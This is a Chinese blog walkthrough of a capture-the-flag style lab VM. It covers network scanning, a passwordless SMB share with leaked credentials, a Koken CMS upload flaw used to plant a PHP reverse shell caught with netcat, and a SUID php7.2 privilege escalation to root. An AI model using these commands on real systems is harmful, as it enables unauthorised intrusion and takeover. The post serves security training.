废话不多说。下载安装先。

启动kali虚拟机

继续arp-scan -l查询目标ip

目标:192.168.163.130,使用浏览器访问验证

是目标地址

使用nmap -sS -A 192.168.163.130查询相关的端口信息

开放端口:80,139,445,8000

刚刚80端口这边我们已经访问过了,是纯静态的内容,逐一访问,发现8000端口存在一个CMS系统

是一个koken的cms,查询源码发现是0.22.24版本

使用nikto扫描工具扫描目录

nikto -h http://192.168.163.130:8000/

可能存在admin目录,我们访问一下试试看

页面设计的还不错。。。

登录需要邮箱。我们目前没有,查阅exp库发现koken版本0.22.24的上传漏洞

不过我没法登录,咋上传啊,首页也没有上传点呐

于是乎,这个漏洞只能后期用

刚刚我们发现存在445 139端口,具有smb的特征,那么,文件系统是否有值得我们搜索的东西呢

使用enum4linux探索445端口 enum4linux 192.168.163.130

没有账号密码,我们使用空密码连接挂载到我们本地目录下去

看到有两个文件,第一个似乎是什么邮件的文件,我们cat一下

那是密码吗?是邮箱号码?

agi@photographer.com 或者daisa@photographer.com 密码: babygirl

都试试看

登录成功

这样一来,刚刚的上传漏洞就能搞他了

使用Kali自带的php反弹脚本来进行利用

cp /usr/share/webshells/php/php-reverse-shell.php ~/yyssdd.php.jpg

改一下监听端口七七八八。

接下来上传,使用burp修改后缀名

访问我们刚刚上传的

另外在kali这边设置好监听

nc -lvnp 1234

监听好后开始访问,获取到反弹shell

接下来

python3 -c 'import pty;pty.spawn("/bin/bash")'
获取到交互式shell

接下来查询关键的具有suid访问权限的程序

find / -perm -u=s -type f 2>/dev/null

发现有一个php7.2的东东具有权限,我们利用php7.2获取到root权限

/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"

使用php7.2的exec调起sh执行

获取到root最高权

似乎是旗子,搞定


天渊应龙圣神大帝-道锋潜鳞

天渊应龙圣神大帝-道锋潜鳞

以凡人之躯,承载天之道义

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注